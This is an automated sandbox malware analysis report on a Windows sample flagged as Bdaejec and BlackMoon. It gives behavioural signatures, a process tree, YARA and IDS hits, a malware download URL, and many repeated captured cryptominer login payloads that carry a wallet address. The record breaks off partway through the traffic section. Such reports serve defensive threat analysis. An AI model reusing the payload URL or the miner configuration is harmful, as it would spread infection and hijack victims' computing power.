Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_48.exe

Overview

General Information

Sample name:LisectAVT_2403002B_48.exe
Analysis ID:1481620
MD5:eead4e7646c126c720e4ed71a65a57e1
SHA1:41e4415cba94a25f161b3481a72aa3ff3d862358
SHA256:fa62c037474b2042950a0c4ee438e6fda99ab4a62ea31afd29cb78b46ac24d34
Tags:exe
Infos:

Detection

Bdaejec, BlackMoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected BlackMoon Ransomware
Detected Stratum mining protocol
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Protects its processes via BreakOnTermination flag
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002B_48.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_48.exe" MD5: EEAD4E7646C126C720E4ED71A65A57E1)
    • VSFdoO.exe (PID: 6668 cmdline: C:\Users\user\AppData\Local\Temp\VSFdoO.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • SGuard.exe (PID: 6928 cmdline: -Embedding MD5: 116A29D2FB23771FC0EF863387C51933)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7024 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4408 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
    00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
      00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
        Process Memory Space: LisectAVT_2403002B_48.exe PID: 6620JoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
          Process Memory Space: VSFdoO.exe PID: 6668JoeSecurity_BdaejecYara detected BdaejecJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
              0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
              • 0x114e4c:$s1: blackmoon
              • 0x114e8c:$s2: BlackMoon RunTime Error:
              2.2.svchost.exe.10000000.0.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                2.2.svchost.exe.10000000.0.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
                • 0x11c5dc:$s1: blackmoon
                • 0x11c61c:$s2: BlackMoon RunTime Error:
                0.2.LisectAVT_2403002B_48.exe.405218.1.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                  Click to see the 7 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper, CommandLine: C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper, ProcessId: 6848, ProcessName: svchost.exe
                  No Snort rule has matched
                  Timestamp:2024-07-25T12:00:06.397472+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49737
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-25T11:59:27.936291+0200
                  SID:2807908
                  Source Port:49730
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-25T12:00:50.771932+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49743
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-25T11:59:27.472112+0200
                  SID:2838522
                  Source Port:50652
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-25T12:00:12.790180+0200
                  SID:2028371
                  Source Port:49742
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: LisectAVT_2403002B_48.exeAvira: detected
                  Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rar8T.Avira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.raryAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarPAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rartAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k1.raruAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarPTFAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarqTAvira URL Cloud: Label: malware
                  Source: C:\Windows\SGuard.exeAvira: detection malicious, Label: HEUR/AGEN.1313076
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Users\user\AppData\Roaming\winoshelper.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                  Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
                  Source: C:\Windows\SGuard.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\winoshelper.dllJoe Sandbox ML: detected
                  Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeJoe Sandbox ML: detected
                  Source: LisectAVT_2403002B_48.exeJoe Sandbox ML: detected

                  Bitcoin Miner

                  barindex
                  Source: global trafficTCP traffic: 192.168.2.4:49744 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49745 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49746 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49747 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49748 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49749 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49750 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49751 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49752 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49753 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49754 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49755 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625